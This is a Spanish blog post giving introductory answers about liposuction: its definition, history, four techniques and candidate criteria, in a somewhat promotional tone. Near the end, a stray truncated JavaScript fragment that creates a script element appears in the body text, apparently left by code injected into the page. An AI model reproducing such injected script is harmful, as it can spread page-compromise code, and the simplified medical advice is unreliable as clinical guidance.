Salud y belleza » Cirugía estética

Dudas sobre la liposucción o lipoaspiración I

1 Comentario

¿A qué se denomina liposucción o lipoaspiración?

La lipoaspiración, también conocida como proceso de liposucción, es un tipo de tecnología sanitaria que se utiliza en cirugía estética. Este proceso permite un remodelado de la silueta mediante la extracción de grasa o tejido adiposo ubicados en diferentes partes del cuerpo.

La técnica fue inventada por el ginecólogo italiano, Giorgio Fischer, en 1974 (aunque recién un par de años después sería utilizada con fines estéticos) y, en la actualidad, es uno de los procedimientos más demandados tanto por el sexo femenino como masculino.

El proceso en sí no solo tiene como objetivo la extracción de los tejidos adiposos sobrantes sino, más bien, el reacondicionamiento de los mismos: el propósito es moldear el cuerpo del paciente y reducir el peso, pero esto no significa que necesariamente sea un tratamiento para el control de la obesidad.

¿Cuántas clases de liposucción existen y en qué varían estas técnicas?

En la actualidad, básicamente pueden destacarse cuatro técnicas para llevar a cabo el proceso de lipoaspiración: tumescente, asistida por ultrasonido, asistida por potencia y la liposelection.

En la lipoaspiración tumescente el profesional dispone de una importante cantidad de líquido salino para aflojar el tejido graso de los músculos (lo que resulta más fácil al momento de eliminar las grasas).

La liposucción asistida por ultrasonido utiliza energía denominada “ultrasónica” para destruir la grasa antes de su eliminación; en cambio la asistida por potencia es una clase de liposucción tumescente para la cual se requiere una cánula vibratoria (básicamente, “destructora” de las grasas).

LipoSelection, por último, engloba el uso de sondas acanaladas y una cánula especializada.

¿Cómo puede definirse a un buen candidato para la liposucción?

Los potenciales candidatos a efectuarse el proceso de lipoaspiración deberán reunir ciertas condiciones.  Su peso, por ejemplo, debe ser normal o aproximarse a ciertos cánones (recordemos que para quitar grasa desmesurada existen otros procedimientos). Las personas que tienen zonas con grasa localizada son siempre candidatos perfectos a esta operación (se sorprenderán con los resultados). En cuanto a los límites de edad, ciertamente no existen trabas, sin embargo cualquier persona que padezca un problema médico como diabetes o circulación sanguínea deficiente no debería solicitar ese tratamiento.

No te pierdas la segunda parte de este análisis sobre la liposucción o lipoaspiración. En la próxima entrega un análisis específico, ya no sobre la naturaleza básica del procedimiento, sino acerca de los beneficios y las consecuencias.

Seguir leyendo sobre  la liposucción o lipoaspiración}var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , , ,

One Comment »

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.